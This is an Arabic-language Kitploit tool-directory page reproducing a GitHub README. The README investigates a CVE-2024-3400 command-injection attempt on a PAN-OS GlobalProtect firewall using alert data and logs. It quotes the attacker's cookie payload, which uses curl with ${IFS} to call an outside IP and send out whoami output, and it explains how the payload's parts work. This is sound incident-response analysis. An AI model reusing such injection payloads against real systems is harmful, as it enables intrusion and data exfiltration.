Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — التحقيق في محاولة حقن أوامر في PAN-OS المرتبطة بـ CVE-2024-3400، مع تحليل تسليم الحمولة والمعالجة الداخلية والتحقق من التنفيذ بناءً على الأدلة المستمدة من السجلات. | Kitploit
أدوات/GitHubGitHub/zedocun/pan-os-cve-2024-3400-command-injection-investigation
تحليل الثغرات الأمنيةأمن الويبالتحاليل الرقمية الجنائيةاستخبارات التهديداتالاستجابة للحوادثتحليل السجلات
GitHubzedocun/pan-os-cve-2024-3400-command-injection-investigation

PAN-OS-CVE-2024-3400-Command-Injection-Investigation

التحقيق في محاولة حقن أوامر في PAN-OS المرتبطة بـ CVE-2024-3400، مع تحليل تسليم الحمولة والمعالجة الداخلية والتحقق من التنفيذ بناءً على الأدلة المستمدة من السجلات.

عرض المستودع
115منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Read on Medium

التحقيق في محاولة حقن أوامر CVE-2024-3400 في PAN-OS

نظرة عامة

يوثّق هذا المشروع التحقيق في محاولة حقن أوامر CVE-2024-3400 التي استهدفت خدمة PAN-OS GlobalProtect.

كان الهدف هو تحديد:

  • ما إذا كان هذا هجومًا حقيقيًا
  • ما إذا كان تنفيذ الأوامر قد حدث
  • ما إذا كانت هناك أدلة على الاختراق

نظرة عامة على التنبيه

تم إطلاق تنبيه حرج يشير إلى وجود محاولة استغلال محتملة.

  • الهدف: 172.16.17.139 (PA-Firewall-01)
  • المصدر: 144.172.79.92
  • نقطة النهاية: /global-protect/login.esp
  • الطريقة: POST
  • الإجراء: مسموح

Alert Overview


الحمولة الخبيثة

يحتوي الطلب على ملف تعريف ارتباط (Cookie) مُصمَّم خصيصًا:

SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

Payload

الملاحظات الرئيسية

  • ${IFS} يتجاوز تصفية المسافات
  • whoami يحاول استرداد هوية النظام
  • curl يحاول إجراء اتصال خارجي

هذه حمولة حقن أوامر


أدلة خادم الويب

تؤكد سجلات Nginx أن الطلب وصل إلى الخادم:

POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Nginx Logs

تم قبول الطلب الخبيث ومعالجته.


المعالجة الداخلية

تُظهر سجلات النظام أن الحمولة وصلت إلى المنطق الداخلي:

Processing Logs

النتيجة الرئيسية

  • تم تضمين الحمولة في الأمر الداخلي (dt_curl)
  • تمت محاولة إرسال طلب خارجي
  • وصلت سلسلة التنفيذ إلى المكونات الداخلية

ومع ذلك:

فشل تحليل DNS → فشل الاتصال الخارجي


البنية التحتية للمهاجم

عنوان IP المهاجم:

  • 144.172.79.92
  • تم وضع علامة عليه كخبيث
  • مرتبط بمزود استضافة

Attacker IP

هذا يؤكد أن مصدر المهاجم خارجي.


الخط الزمني للشبكة

تفاعلت عناوين IP متعددة مع النظام قبل الهجوم:

Timeline

فقط 144.172.79.92 مرتبط مباشرة بالاستغلال.


تقييم التأثير

ما تم تأكيده

  • محاولة استغلال تستهدف CVE-2024-3400
  • تم تسليم حمولة خبيثة
  • تمت معالجة الطلب بواسطة الخادم
  • وصلت الحمولة إلى المعالجة الداخلية
  • تم تشغيل محاولة اتصال خارجي

ما لم يتم تأكيده

  • تنفيذ أوامر نظام التشغيل
  • مخرجات الأوامر
  • تسريب البيانات
  • صدفة عكسية (Reverse Shell)
  • الثبات (Persistence)
  • الحركة الجانبية

الخلاصة

كانت هذه محاولة حقن أوامر حقيقية.

نجح المهاجم في:

  • تسليم طلب خبيث
  • حقن حمولة
  • تشغيل المعالجة الداخلية

ومع ذلك:

لا يوجد تنفيذ مؤكد أو اختراق للنظام


التصنيف النهائي

محاولة حقن أوامر
تمت معالجة الحمولة - لا يوجد تنفيذ أو تأثير مؤكد

تنزيل الأداة